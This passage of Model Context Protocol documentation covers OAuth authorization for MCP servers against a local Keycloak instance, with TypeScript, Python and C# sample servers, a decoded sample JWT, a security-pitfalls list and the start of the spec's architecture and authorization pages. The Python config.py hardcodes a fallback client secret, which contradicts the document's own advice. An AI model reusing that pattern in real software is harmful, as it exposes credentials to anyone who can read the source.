eyJhbGciOiJSUzI1NiIsInR5cCIgOiAiSldUIiwia2lkIiA6ICI1TjcxMGw1WW5MWk13WGZ1VlJKWGtCS3ZZMzZzb3JnRG5scmlyZ2tlTHlzIn0.eyJleHAiOjE3NTU1NDA4MTcsImlhdCI6MTc1NTU0MDc1NywiYXV0aF90aW1lIjoxNzU1NTM4ODg4LCJqdGkiOiJvbnJ0YWM6YjM0MDgwZmYtODQwNC02ODY3LTgxYmUtMTIzMWI1MDU5M2E4IiwiaXNzIjoiaHR0cDovL2xvY2FsaG9zdDo4MDgwL3JlYWxtcy9tYXN0ZXIiLCJhdWQiOiJodHRwOi8vbG9jYWxob3N0OjMwMDAiLCJzdWIiOiIzM2VkNmM2Yi1jNmUwLTQ5MjgtYTE2MS1mMmY2OWM3YTAzYjkiLCJ0eXAiOiJCZWFyZXIiLCJhenAiOiI3OTc1YTViNi04YjU5LTRhODUtOWNiYS04ZmFlYmRhYjg5NzQiLCJzaWQiOiI4ZjdlYzI3Ni0zNThmLTRjY2MtYjMxMy1kYjA4MjkwZjM3NmYiLCJzY29wZSI6Im1jcDp0b29scyJ9.P5xCRtXORly0R0EXjyqRCUx-z3J4uAOWNAvYtLPXroykZuVCCJ-K1haiQSwbURqfsVOMbL7jiV-sD6miuPzI1tmKOkN_Yct0Vp-azvj7U5rEj7U6tvPfMkg2Uj_jrIX0KOskyU2pVvGZ-5BgqaSvwTEdsGu_V3_E0xDuSBq2uj_wmhqiyTFm5lJ1WkM3Hnxxx1_AAnTj7iOKMFZ4VCwMmk8hhSC7clnDauORc0sutxiJuYUZzxNiNPkmNeQtMCGqWdP1igcbWbrfnNXhJ6NswBOuRbh97_QraET3hl-CNmyS6C72Xc0aOwR_uJ7xVSBTD02OaQ1JA6kjCATz30kGYg
```
Decoded, it will look like this:
```json theme={null}
{
"alg": "RS256",
"typ": "JWT",
"kid": "5N710l5YnLZMwXfuVRJXkBKvY36sorgDnlrirgkeLys"
}.{
"exp": 1755540817,
"iat": 1755540757,
"auth_time": 1755538888,
"jti": "onrtac:b34080ff-8404-6867-81be-1231b50593a8",
"iss": "http://localhost:8080/realms/master",
"aud": "http://localhost:3000",
"sub": "33ed6c6b-c6e0-4928-a161-f2f69c7a03b9",
"typ": "Bearer",
"azp": "7975a5b6-8b59-4a85-9cba-8faebdab8974",
"sid": "8f7ec276-358f-4ccc-b313-db08290f376f",
"scope": "mcp:tools"
}.[Signature]
```
**Embedded Audience**
Notice the `aud` claim embedded in the token - it's currently set to be the URI of the test MCP server and it's inferred from the scope that we've previously configured. This will be important in our implementation to validate.
### MCP Server Setup
We will now set up our MCP server to use the locally-running Keycloak authorization server. Depending on your programming language preference, you can use one of the supported [MCP SDKs](/docs/sdk).
For our testing purposes, we will create an extremely simple MCP server that exposes two tools - one for addition and another for multiplication. The server will require authorization to access these.
You can see the complete TypeScript project in the [sample repository](https://github.com/localden/min-ts-mcp-auth).
Prior to running the code below, ensure that you have a `.env` file with the following content:
```env theme={null}
# Server host/port
HOST=localhost
PORT=3000
# Auth server location
AUTH_HOST=localhost
AUTH_PORT=8080
AUTH_REALM=master
# Keycloak OAuth client credentials
OAUTH_CLIENT_ID=
OAUTH_CLIENT_SECRET=
```
`OAUTH_CLIENT_ID` and `OAUTH_CLIENT_SECRET` are associated with the MCP server client we created earlier.
In addition to implementing the MCP authorization specification, the server below also does token introspection via Keycloak to make sure that the token it receives from the client is valid. It also implements basic logging to allow you to easily diagnose any issues.
```typescript theme={null}
import "dotenv/config";
import express from "express";
import { randomUUID } from "node:crypto";
import { McpServer } from "@modelcontextprotocol/sdk/server/mcp.js";
import { StreamableHTTPServerTransport } from "@modelcontextprotocol/sdk/server/streamableHttp.js";
import { isInitializeRequest } from "@modelcontextprotocol/sdk/types.js";
import { z } from "zod";
import cors from "cors";
import {
mcpAuthMetadataRouter,
getOAuthProtectedResourceMetadataUrl,
} from "@modelcontextprotocol/sdk/server/auth/router.js";
import { requireBearerAuth } from "@modelcontextprotocol/sdk/server/auth/middleware/bearerAuth.js";
import { OAuthMetadata } from "@modelcontextprotocol/sdk/shared/auth.js";
import { checkResourceAllowed } from "@modelcontextprotocol/sdk/shared/auth-utils.js";
const CONFIG = {
host: process.env.HOST || "localhost",
port: Number(process.env.PORT) || 3000,
auth: {
host: process.env.AUTH_HOST || process.env.HOST || "localhost",
port: Number(process.env.AUTH_PORT) || 8080,
realm: process.env.AUTH_REALM || "master",
clientId: process.env.OAUTH_CLIENT_ID || "mcp-server",
clientSecret: process.env.OAUTH_CLIENT_SECRET || "",
},
};
function createOAuthUrls() {
const authBaseUrl = new URL(
`http://${CONFIG.auth.host}:${CONFIG.auth.port}/realms/${CONFIG.auth.realm}/`,
);
return {
issuer: authBaseUrl.toString(),
introspection_endpoint: new URL(
"protocol/openid-connect/token/introspect",
authBaseUrl,
).toString(),
authorization_endpoint: new URL(
"protocol/openid-connect/auth",
authBaseUrl,
).toString(),
token_endpoint: new URL(
"protocol/openid-connect/token",
authBaseUrl,
).toString(),
};
}
function createRequestLogger() {
return (req: any, res: any, next: any) => {
const start = Date.now();
res.on("finish", () => {
const ms = Date.now() - start;
console.log(
`${req.method} ${req.originalUrl} -> ${res.statusCode} ${ms}ms`,
);
});
next();
};
}
const app = express();
app.use(
express.json({
verify: (req: any, _res, buf) => {
req.rawBody = buf?.toString() ?? "";
},
}),
);
app.use(
cors({
origin: "*",
exposedHeaders: ["Mcp-Session-Id"],
}),
);
app.use(createRequestLogger());
const mcpServerUrl = new URL(`http://${CONFIG.host}:${CONFIG.port}`);
const oauthUrls = createOAuthUrls();
const oauthMetadata: OAuthMetadata = {
...oauthUrls,
response_types_supported: ["code"],
};
const tokenVerifier = {
verifyAccessToken: async (token: string) => {
const endpoint = oauthMetadata.introspection_endpoint;
if (!endpoint) {
console.error("[auth] no introspection endpoint in metadata");
throw new Error("No token verification endpoint available in metadata");
}
const params = new URLSearchParams({
token: token,
client_id: CONFIG.auth.clientId,
});
if (CONFIG.auth.clientSecret) {
params.set("client_secret", CONFIG.auth.clientSecret);
}
let response: Response;
try {
response = await fetch(endpoint, {
method: "POST",
headers: {
"Content-Type": "application/x-www-form-urlencoded",
},
body: params.toString(),
});
} catch (e) {
console.error("[auth] introspection fetch threw", e);
throw e;
}
if (!response.ok) {
const txt = await response.text();
console.error("[auth] introspection non-OK", { status: response.status });
try {
const obj = JSON.parse(txt);
console.log(JSON.stringify(obj, null, 2));
} catch {
console.error(txt);
}
throw new Error(`Invalid or expired token: ${txt}`);
}
let data: any;
try {
data = await response.json();
} catch (e) {
const txt = await response.text();
console.error("[auth] failed to parse introspection JSON", {
error: String(e),
body: txt,
});
throw e;
}
if (data.active === false) {
throw new Error("Inactive token");
}
if (!data.aud) {
throw new Error("Resource indicator (aud) missing");
}
const audiences: string[] = Array.isArray(data.aud) ? data.aud : [data.aud];
const allowed = audiences.some((a) =>
checkResourceAllowed({
requestedResource: a,
configuredResource: mcpServerUrl,
}),
);
if (!allowed) {
throw new Error(
`None of the provided audiences are allowed. Expected ${mcpServerUrl}, got: ${audiences.join(", ")}`,
);
}
return {
token,
clientId: data.client_id,
scopes: data.scope ? data.scope.split(" ") : [],
expiresAt: data.exp,
};
},
};
app.use(
mcpAuthMetadataRouter({
oauthMetadata,
resourceServerUrl: mcpServerUrl,
scopesSupported: ["mcp:tools"],
resourceName: "MCP Demo Server",
}),
);
const authMiddleware = requireBearerAuth({
verifier: tokenVerifier,
requiredScopes: [],
resourceMetadataUrl: getOAuthProtectedResourceMetadataUrl(mcpServerUrl),
});
const transports: { [sessionId: string]: StreamableHTTPServerTransport } = {};
function createMcpServer() {
const server = new McpServer({
name: "example-server",
version: "1.0.0",
});
server.registerTool(
"add",
{
title: "Addition Tool",
description: "Add two numbers together",
inputSchema: {
a: z.number().describe("First number to add"),
b: z.number().describe("Second number to add"),
},
},
async ({ a, b }) => ({
content: [{ type: "text", text: `${a} + ${b} = ${a + b}` }],
}),
);
server.registerTool(
"multiply",
{
title: "Multiplication Tool",
description: "Multiply two numbers together",
inputSchema: {
x: z.number().describe("First number to multiply"),
y: z.number().describe("Second number to multiply"),
},
},
async ({ x, y }) => ({
content: [{ type: "text", text: `${x} × ${y} = ${x * y}` }],
}),
);
return server;
}
const mcpPostHandler = async (req: express.Request, res: express.Response) => {
const sessionId = req.headers["mcp-session-id"] as string | undefined;
let transport: StreamableHTTPServerTransport;
if (sessionId && transports[sessionId]) {
transport = transports[sessionId];
} else if (!sessionId && isInitializeRequest(req.body)) {
transport = new StreamableHTTPServerTransport({
sessionIdGenerator: () => randomUUID(),
onsessioninitialized: (sessionId) => {
transports[sessionId] = transport;
},
});
transport.onclose = () => {
if (transport.sessionId) {
delete transports[transport.sessionId];
}
};
const server = createMcpServer();
await server.connect(transport);
} else {
res.status(400).json({
jsonrpc: "2.0",
error: {
code: -32000,
message: "Bad Request: No valid session ID provided",
},
id: null,
});
return;
}
await transport.handleRequest(req, res, req.body);
};
const handleSessionRequest = async (
req: express.Request,
res: express.Response,
) => {
const sessionId = req.headers["mcp-session-id"] as string | undefined;
if (!sessionId || !transports[sessionId]) {
res.status(400).send("Invalid or missing session ID");
return;
}
const transport = transports[sessionId];
await transport.handleRequest(req, res);
};
app.post("/", authMiddleware, mcpPostHandler);
app.get("/", authMiddleware, handleSessionRequest);
app.delete("/", authMiddleware, handleSessionRequest);
app.listen(CONFIG.port, CONFIG.host, () => {
console.log(`🚀 MCP Server running on ${mcpServerUrl.origin}`);
console.log(`📡 MCP endpoint available at ${mcpServerUrl.origin}`);
console.log(
`🔐 OAuth metadata available at ${getOAuthProtectedResourceMetadataUrl(mcpServerUrl)}`,
);
});
```
When you run the server, you can add it to your MCP client, such as Visual Studio Code, by providing the MCP server endpoint.
For more details about implementing MCP servers in TypeScript, refer to the [TypeScript SDK documentation](https://github.com/modelcontextprotocol/typescript-sdk).
You can see the complete Python project in the [sample repository](https://github.com/localden/min-py-mcp-auth).
To simplify our authorization interaction, in Python scenarios we rely on [FastMCP](https://gofastmcp.com/getting-started/welcome). Many of the conventions around authorization, like the endpoints and token validation logic, are consistent across languages, but some offer simpler ways of integrating them in production scenarios.
Prior to writing the actual server, we need to set up our configuration in `config.py` - the contents are entirely based on your local server setup:
```python theme={null}
"""Configuration settings for the MCP auth server."""
import os
from typing import Optional
class Config:
"""Configuration class that loads from environment variables with sensible defaults."""
# Server settings
HOST: str = os.getenv("HOST", "localhost")
PORT: int = int(os.getenv("PORT", "3000"))
# Auth server settings
AUTH_HOST: str = os.getenv("AUTH_HOST", "localhost")
AUTH_PORT: int = int(os.getenv("AUTH_PORT", "8080"))
AUTH_REALM: str = os.getenv("AUTH_REALM", "master")
# OAuth client settings
OAUTH_CLIENT_ID: str = os.getenv("OAUTH_CLIENT_ID", "mcp-server")
OAUTH_CLIENT_SECRET: str = os.getenv("OAUTH_CLIENT_SECRET", "UO3rmozkFFkXr0QxPTkzZ0LMXDidIikB")
# Server settings
MCP_SCOPE: str = os.getenv("MCP_SCOPE", "mcp:tools")
OAUTH_STRICT: bool = os.getenv("OAUTH_STRICT", "false").lower() in ("true", "1", "yes")
TRANSPORT: str = os.getenv("TRANSPORT", "streamable-http")
@property
def server_url(self) -> str:
"""Build the server URL."""
return f"http://{self.HOST}:{self.PORT}"
@property
def auth_base_url(self) -> str:
"""Build the auth server base URL."""
return f"http://{self.AUTH_HOST}:{self.AUTH_PORT}/realms/{self.AUTH_REALM}/"
def validate(self) -> None:
"""Validate configuration."""
if self.TRANSPORT not in ["sse", "streamable-http"]:
raise ValueError(f"Invalid transport: {self.TRANSPORT}. Must be 'sse' or 'streamable-http'")
# Global configuration instance
config = Config()
```
The server implementation is as follows:
```python theme={null}
import datetime
import logging
from typing import Any
from pydantic import AnyHttpUrl
from mcp.server.auth.settings import AuthSettings
from mcp.server.fastmcp.server import FastMCP
from .config import config
from .token_verifier import IntrospectionTokenVerifier
logger = logging.getLogger(__name__)
def create_oauth_urls() -> dict[str, str]:
"""Create OAuth URLs based on configuration (Keycloak-style)."""
from urllib.parse import urljoin
auth_base_url = config.auth_base_url
return {
"issuer": auth_base_url,
"introspection_endpoint": urljoin(auth_base_url, "protocol/openid-connect/token/introspect"),
"authorization_endpoint": urljoin(auth_base_url, "protocol/openid-connect/auth"),
"token_endpoint": urljoin(auth_base_url, "protocol/openid-connect/token"),
}
def create_server() -> FastMCP:
"""Create and configure the FastMCP server."""
config.validate()
oauth_urls = create_oauth_urls()
token_verifier = IntrospectionTokenVerifier(
introspection_endpoint=oauth_urls["introspection_endpoint"],
server_url=config.server_url,
client_id=config.OAUTH_CLIENT_ID,
client_secret=config.OAUTH_CLIENT_SECRET,
)
app = FastMCP(
name="MCP Resource Server",
instructions="Resource Server that validates tokens via Authorization Server introspection",
host=config.HOST,
port=config.PORT,
debug=True,
streamable_http_path="/",
token_verifier=token_verifier,
auth=AuthSettings(
issuer_url=AnyHttpUrl(oauth_urls["issuer"]),
required_scopes=[config.MCP_SCOPE],
resource_server_url=AnyHttpUrl(config.server_url),
),
)
@app.tool()
async def add_numbers(a: float, b: float) -> dict[str, Any]:
"""
Add two numbers together.
This tool demonstrates basic arithmetic operations with OAuth authentication.
Args:
a: The first number to add
b: The second number to add
"""
result = a + b
return {
"operation": "addition",
"operand_a": a,
"operand_b": b,
"result": result,
"timestamp": datetime.datetime.now().isoformat()
}
@app.tool()
async def multiply_numbers(x: float, y: float) -> dict[str, Any]:
"""
Multiply two numbers together.
This tool demonstrates basic arithmetic operations with OAuth authentication.
Args:
x: The first number to multiply
y: The second number to multiply
"""
result = x * y
return {
"operation": "multiplication",
"operand_x": x,
"operand_y": y,
"result": result,
"timestamp": datetime.datetime.now().isoformat()
}
return app
def main() -> int:
"""
Run the MCP Resource Server.
This server:
- Provides RFC 9728 Protected Resource Metadata
- Validates tokens via Authorization Server introspection
- Serves MCP tools requiring authentication
Configuration is loaded from config.py and environment variables.
"""
logging.basicConfig(level=logging.INFO)
try:
config.validate()
oauth_urls = create_oauth_urls()
except ValueError as e:
logger.error("Configuration error: %s", e)
return 1
try:
mcp_server = create_server()
logger.info("Starting MCP Server on %s:%s", config.HOST, config.PORT)
logger.info("Authorization Server: %s", oauth_urls["issuer"])
logger.info("Transport: %s", config.TRANSPORT)
mcp_server.run(transport=config.TRANSPORT)
return 0
except Exception:
logger.exception("Server error")
return 1
if __name__ == "__main__":
exit(main())
```
Lastly, the token verification logic is delegated entirely to `token_verifier.py`, ensuring that we can use the Keycloak introspection endpoint to verify the validity of any credential artifacts
```python theme={null}
"""Token verifier implementation using OAuth 2.0 Token Introspection (RFC 7662)."""
import logging
from typing import Any
from mcp.server.auth.provider import AccessToken, TokenVerifier
from mcp.shared.auth_utils import check_resource_allowed, resource_url_from_server_url
logger = logging.getLogger(__name__)
class IntrospectionTokenVerifier(TokenVerifier):
"""Token verifier that uses OAuth 2.0 Token Introspection (RFC 7662).
"""
def __init__(
self,
introspection_endpoint: str,
server_url: str,
client_id: str,
client_secret: str,
):
self.introspection_endpoint = introspection_endpoint
self.server_url = server_url
self.client_id = client_id
self.client_secret = client_secret
self.resource_url = resource_url_from_server_url(server_url)
async def verify_token(self, token: str) -> AccessToken | None:
"""Verify token via introspection endpoint."""
import httpx
if not self.introspection_endpoint.startswith(("https://", "http://localhost", "http://127.0.0.1")):
return None
timeout = httpx.Timeout(10.0, connect=5.0)
limits = httpx.Limits(max_connections=10, max_keepalive_connections=5)
async with httpx.AsyncClient(
timeout=timeout,
limits=limits,
verify=True,
) as client:
try:
form_data = {
"token": token,
"client_id": self.client_id,
"client_secret": self.client_secret,
}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
response = await client.post(
self.introspection_endpoint,
data=form_data,
headers=headers,
)
if response.status_code != 200:
return None
data = response.json()
if not data.get("active", False):
return None
if not self._validate_resource(data):
return None
return AccessToken(
token=token,
client_id=data.get("client_id", "unknown"),
scopes=data.get("scope", "").split() if data.get("scope") else [],
expires_at=data.get("exp"),
resource=data.get("aud"), # Include resource in token
)
except Exception as e:
return None
def _validate_resource(self, token_data: dict[str, Any]) -> bool:
"""Validate token was issued for this resource server.
Rules:
- Reject if 'aud' missing.
- Accept if any audience entry matches the derived resource URL.
- Supports string or list forms per JWT spec.
"""
if not self.server_url or not self.resource_url:
return False
aud: list[str] | str | None = token_data.get("aud")
if isinstance(aud, list):
return any(self._is_valid_resource(a) for a in aud)
if isinstance(aud, str):
return self._is_valid_resource(aud)
return False
def _is_valid_resource(self, resource: str) -> bool:
"""Check if the given resource matches our server."""
return check_resource_allowed(self.resource_url, resource)
```
For more details, see the [Python SDK documentation](https://github.com/modelcontextprotocol/python-sdk).
You can see the complete C# project in the [sample repository](https://github.com/localden/min-cs-mcp-auth).
To set up authorization in your MCP server using the MCP C# SDK, you can lean on the standard ASP.NET Core builder pattern. Instead of using the introspection endpoint provided by Keycloak, we will use built-in ASP.NET Core capabilities for token validation.
```csharp theme={null}
using Microsoft.AspNetCore.Authentication.JwtBearer;
using Microsoft.IdentityModel.Tokens;
using ModelContextProtocol.AspNetCore.Authentication;
using ProtectedMcpServer.Tools;
using System.Security.Claims;
var builder = WebApplication.CreateBuilder(args);
var serverUrl = "http://localhost:3000/";
var authorizationServerUrl = "http://localhost:8080/realms/master/";
builder.Services.AddAuthentication(options =>
{
options.DefaultChallengeScheme = McpAuthenticationDefaults.AuthenticationScheme;
options.DefaultAuthenticateScheme = JwtBearerDefaults.AuthenticationScheme;
})
.AddJwtBearer(options =>
{
options.Authority = authorizationServerUrl;
var normalizedServerAudience = serverUrl.TrimEnd('/');
options.TokenValidationParameters = new TokenValidationParameters
{
ValidIssuer = authorizationServerUrl,
ValidAudiences = new[] { normalizedServerAudience, serverUrl },
AudienceValidator = (audiences, securityToken, validationParameters) =>
{
if (audiences == null) return false;
foreach (var aud in audiences)
{
if (string.Equals(aud.TrimEnd('/'), normalizedServerAudience, StringComparison.OrdinalIgnoreCase))
{
return true;
}
}
return false;
}
};
options.RequireHttpsMetadata = false; // Set to true in production
options.Events = new JwtBearerEvents
{
OnTokenValidated = context =>
{
var name = context.Principal?.Identity?.Name ?? "unknown";
var email = context.Principal?.FindFirstValue("preferred_username") ?? "unknown";
Console.WriteLine($"Token validated for: {name} ({email})");
return Task.CompletedTask;
},
OnAuthenticationFailed = context =>
{
Console.WriteLine($"Authentication failed: {context.Exception.Message}");
return Task.CompletedTask;
},
};
})
.AddMcp(options =>
{
options.ResourceMetadata = new()
{
Resource = new Uri(serverUrl),
ResourceDocumentation = new Uri("https://docs.example.com/api/math"),
AuthorizationServers = { new Uri(authorizationServerUrl) },
ScopesSupported = ["mcp:tools"]
};
});
builder.Services.AddAuthorization();
builder.Services.AddHttpContextAccessor();
builder.Services.AddMcpServer()
.WithTools()
.WithHttpTransport();
var app = builder.Build();
app.UseAuthentication();
app.UseAuthorization();
app.MapMcp().RequireAuthorization();
Console.WriteLine($"Starting MCP server with authorization at {serverUrl}");
Console.WriteLine($"Using Keycloak server at {authorizationServerUrl}");
Console.WriteLine($"Protected Resource Metadata URL: {serverUrl}.well-known/oauth-protected-resource");
Console.WriteLine("Exposed Math tools: Add, Multiply");
Console.WriteLine("Press Ctrl+C to stop the server");
app.Run(serverUrl);
```
For more details, see the [C# SDK documentation](https://github.com/modelcontextprotocol/csharp-sdk).
## Testing the MCP Server
For testing purposes, we will be using [Visual Studio Code](https://code.visualstudio.com), but any client that supports MCP and the new authorization specification will fit.
Press Cmd + Shift + P and select **MCP: Add server...**. Select **HTTP** and enter `http://localhost:3000`. Give the server a unique name to be used inside Visual Studio Code. In `mcp.json` you should now see an entry like this:
```json theme={null}
"my-mcp-server-18676652": {
"url": "http://localhost:3000",
"type": "http"
}
```
On connection, you will be taken to the browser, where you will be prompted to consent to Visual Studio Code having access to the `mcp:tools` scope.
After consenting, you will see the tools listed right above the server entry in `mcp.json`.
You will be able to invoke individual tools with the help of the `#` sign in the chat view.
## Common Pitfalls and How to Avoid Them
For comprehensive security guidance, including attack vectors, mitigation strategies, and implementation best practices, make sure to read through [Security Best Practices](/specification/draft/basic/security_best_practices). A few key issues are called out below.
* **Do not implement token validation or authorization logic by yourself**. Use off-the-shelf, well-tested, and secure libraries for things like token validation or authorization decisions. Doing everything from scratch means that you're more likely to implement things incorrectly unless you are a security expert.
* **Use short-lived access tokens**. Depending on the authorization server used, this setting might be customizable. We recommend to not use long-lived tokens - if a malicious actor steals them, they will be able to maintain their access for longer periods.
* **Always validate tokens**. Just because your server received a token does not mean that the token is valid or that it's meant for your server. Always verify that what your MCP server is getting from the client matches the required constraints.
* **Store tokens in secure, encrypted storage**. In certain scenarios, you might need to cache tokens server-side. If that is the case, ensure that the storage has the right access controls and cannot be easily exfiltrated by malicious parties with access to your server. You should also implement robust cache eviction policies to ensure that your MCP server is not re-using expired or otherwise invalid tokens.
* **Enforce HTTPS in production**. Do not accept tokens or redirect callbacks over plain HTTP except for `localhost` during development.
* **Least-privilege scopes**. Don't use catch‑all scopes. Split access per tool or capability where possible and verify required scopes per route/tool on the resource server.
* **Don't log credentials**. Never log `Authorization` headers, tokens, codes, or secrets. Scrub query strings and headers. Redact sensitive fields in structured logs.
* **Separate app vs. resource server credentials**. Don't reuse your MCP server's client secret for end‑user flows. Store all secrets in a proper secret manager, not in source control.
* **Return proper challenges**. On 401, include `WWW-Authenticate` with `Bearer`, `realm`, and `resource_metadata` so clients can discover how to authenticate.
* **DCR (Dynamic Client Registration) controls**. If enabled, be aware of constraints specific to your organization, such as trusted hosts, required vetting, and audited registrations. Unauthenticated DCR means that anyone can register any client with your authorization server.
* **Multi‑tenant/realm mix-ups**. Pin to a single issuer/tenant unless explicitly multi‑tenant. Reject tokens from other realms even if signed by the same authorization server.
* **Audience/resource indicator misuse**. Don't configure or accept generic audiences (like `api`) or unrelated resources. Require the audience/resource to match your configured server.
* **Error detail leakage**. Return generic messages to clients, but log detailed reasons with correlation IDs internally to aid troubleshooting without exposing internals.
* **Session identifier hardening**. Treat `Mcp-Session-Id` as untrusted input; never tie authorization to it. Regenerate on auth changes and validate lifecycle server‑side.
## Related Standards and Documentation
MCP authorization builds on these well-established standards:
* **[OAuth 2.1](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13)**: The core authorization framework
* **[RFC 8414](https://datatracker.ietf.org/doc/html/rfc8414)**: Authorization Server Metadata discovery
* **[RFC 7591](https://datatracker.ietf.org/doc/html/rfc7591)**: Dynamic Client Registration
* **[RFC 9728](https://datatracker.ietf.org/doc/html/rfc9728)**: Protected Resource Metadata
* **[RFC 8707](https://datatracker.ietf.org/doc/html/rfc8707)**: Resource Indicators
For additional details, refer to:
* [Authorization Specification](/specification/draft/basic/authorization)
* [Security Best Practices](/specification/draft/basic/security_best_practices)
* [Available MCP SDKs](/docs/sdk)
Understanding these standards will help you implement authorization correctly and troubleshoot issues when they arise.
# Architecture
Source: https://modelcontextprotocol.io/specification/2025-11-25/architecture/index
The Model Context Protocol (MCP) follows a client-host-server architecture where each
host can run multiple client instances. This architecture enables users to integrate AI
capabilities across applications while maintaining clear security boundaries and
isolating concerns. Built on JSON-RPC, MCP provides a stateful session protocol focused
on context exchange and sampling coordination between clients and servers.
## Core Components
```mermaid theme={null}
graph LR
subgraph "Application Host Process"
H[Host]
C1[Client 1]
C2[Client 2]
C3[Client 3]
H --> C1
H --> C2
H --> C3
end
subgraph "Local machine"
S1[Server 1 Files & Git]
S2[Server 2 Database]
R1[("Local Resource A")]
R2[("Local Resource B")]
C1 --> S1
C2 --> S2
S1 <--> R1
S2 <--> R2
end
subgraph "Internet"
S3[Server 3 External APIs]
R3[("Remote Resource C")]
C3 --> S3
S3 <--> R3
end
```
### Host
The host process acts as the container and coordinator:
* Creates and manages multiple client instances
* Controls client connection permissions and lifecycle
* Enforces security policies and consent requirements
* Handles user authorization decisions
* Coordinates AI/LLM integration and sampling
* Manages context aggregation across clients
### Clients
Each client is created by the host and maintains an isolated server connection:
* Establishes one stateful session per server
* Handles protocol negotiation and capability exchange
* Routes protocol messages bidirectionally
* Manages subscriptions and notifications
* Maintains security boundaries between servers
A host application creates and manages multiple clients, with each client having a 1:1
relationship with a particular server.
### Servers
Servers provide specialized context and capabilities:
* Expose resources, tools and prompts via MCP primitives
* Operate independently with focused responsibilities
* Request sampling through client interfaces
* Must respect security constraints
* Can be local processes or remote services
## Design Principles
MCP is built on several key design principles that inform its architecture and
implementation:
1. **Servers should be extremely easy to build**
* Host applications handle complex orchestration responsibilities
* Servers focus on specific, well-defined capabilities
* Simple interfaces minimize implementation overhead
* Clear separation enables maintainable code
2. **Servers should be highly composable**
* Each server provides focused functionality in isolation
* Multiple servers can be combined seamlessly
* Shared protocol enables interoperability
* Modular design supports extensibility
3. **Servers should not be able to read the whole conversation, nor "see into" other
servers**
* Servers receive only necessary contextual information
* Full conversation history stays with the host
* Each server connection maintains isolation
* Cross-server interactions are controlled by the host
* Host process enforces security boundaries
4. **Features can be added to servers and clients progressively**
* Core protocol provides minimal required functionality
* Additional capabilities can be negotiated as needed
* Servers and clients evolve independently
* Protocol designed for future extensibility
* Backwards compatibility is maintained
## Capability Negotiation
The Model Context Protocol uses a capability-based negotiation system where clients and
servers explicitly declare their supported features during initialization. Capabilities
determine which protocol features and primitives are available during a session.
* Servers declare capabilities like resource subscriptions, tool support, and prompt
templates
* Clients declare capabilities like sampling support and notification handling
* Both parties must respect declared capabilities throughout the session
* Additional capabilities can be negotiated through extensions to the protocol
```mermaid theme={null}
sequenceDiagram
participant Host
participant Client
participant Server
Host->>+Client: Initialize client
Client->>+Server: Initialize session with capabilities
Server-->>Client: Respond with supported capabilities
Note over Host,Server: Active Session with Negotiated Features
loop Client Requests
Host->>Client: User- or model-initiated action
Client->>Server: Request (tools/resources)
Server-->>Client: Response
Client-->>Host: Update UI or respond to model
end
loop Server Requests
Server->>Client: Request (sampling)
Client->>Host: Forward to AI
Host-->>Client: AI response
Client-->>Server: Response
end
loop Notifications
Server--)Client: Resource updates
Client--)Server: Status changes
end
Host->>Client: Terminate
Client->>-Server: End session
deactivate Server
```
Each capability unlocks specific protocol features for use during the session. For
example:
* Implemented [server features](/specification/2025-11-25/server) must be advertised in the
server's capabilities
* Emitting resource subscription notifications requires the server to declare
subscription support
* Tool invocation requires the server to declare tool capabilities
* [Sampling](/specification/2025-11-25/client) requires the client to declare support in its
capabilities
This capability negotiation ensures clients and servers have a clear understanding of
supported functionality while maintaining protocol extensibility.
# Authorization
Source: https://modelcontextprotocol.io/specification/2025-11-25/basic/authorization
**Protocol Revision**: 2025-11-25
## Introduction
### Purpose and Scope
The Model Context Protocol provides authorization capabilities at the transport level,
enabling MCP clients to make requests to restricted MCP servers on behalf of resource
owners. This specification defines the authorization flow for HTTP-based transports.
### Protocol Requirements
Authorization is **OPTIONAL** for MCP implementations. When supported:
* Implementations using an HTTP-based transport **SHOULD** conform to this specification.
* Implementations using an STDIO transport **SHOULD NOT** follow this specification, and
instead retrieve credentials from the environment.
* Implementations using alternative transports **MUST** follow established security best
practices for their protocol.
### Standards Compliance
This authorization mechanism is based on established specifications listed below, but
implements a selected subset of their features to ensure security and interoperability
while maintaining simplicity:
* OAuth 2.1 IETF DRAFT ([draft-ietf-oauth-v2-1-13](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13))
* OAuth 2.0 Authorization Server Metadata
([RFC8414](https://datatracker.ietf.org/doc/html/rfc8414))
* OAuth 2.0 Dynamic Client Registration Protocol
([RFC7591](https://datatracker.ietf.org/doc/html/rfc7591))
* OAuth 2.0 Protected Resource Metadata ([RFC9728](https://datatracker.ietf.org/doc/html/rfc9728))
* OAuth Client ID Metadata Documents ([draft-ietf-oauth-client-id-metadata-document-00](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-client-id-metadata-document-00))
## Roles
A protected *MCP server* acts as an [OAuth 2.1 resource server](https://www.ietf.org/archive/id/draft-ietf-oauth-v2-1-13.html#name-roles),
capable of accepting and responding to protected resource requests using access tokens.
An *MCP client* acts as an [OAuth 2.1 client](https://www.ietf.org/archive/id/draft-ietf-oauth-v2-1-13.html#name-roles),
making protected resource requests on behalf of a resource owner.
The *authorization server* is responsible for interacting with the user (if necessary) and issuing access tokens for use at the MCP server.
The implementation details of the authorization server are beyond the scope of this specification. It may be hosted with the
resource server or a separate entity. The [Authorization Server Discovery section](#authorization-server-discovery)
specifies how an MCP server indicates the location of its corresponding authorization server to a client.
## Overview
1. Authorization servers **MUST** implement OAuth 2.1 with appropriate security
measures for both confidential and public clients.
2. Authorization servers and MCP clients **SHOULD** support OAuth Client ID Metadata Documents
([draft-ietf-oauth-client-id-metadata-document-00](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-client-id-metadata-document-00)).
3. Authorization servers and MCP clients **MAY** support the OAuth 2.0 Dynamic Client Registration
Protocol ([RFC7591](https://datatracker.ietf.org/doc/html/rfc7591)).
4. MCP servers **MUST** implement OAuth 2.0 Protected Resource Metadata ([RFC9728](https://datatracker.ietf.org/doc/html/rfc9728)).
MCP clients **MUST** use OAuth 2.0 Protected Resource Metadata for authorization server discovery.
5. MCP authorization servers **MUST** provide at least one of the following discovery mechanisms:
* OAuth 2.0 Authorization Server Metadata ([RFC8414](https://datatracker.ietf.org/doc/html/rfc8414))
* [OpenID Connect Discovery 1.0](https://openid.net/specs/openid-connect-discovery-1_0.html)
MCP clients **MUST** support both discovery mechanisms to obtain the information required to interact with the authorization server.
## Authorization Server Discovery
This section describes the mechanisms by which MCP servers advertise their associated
authorization servers to MCP clients, as well as the discovery process through which MCP
clients can determine authorization server endpoints and supported capabilities.
### Authorization Server Location
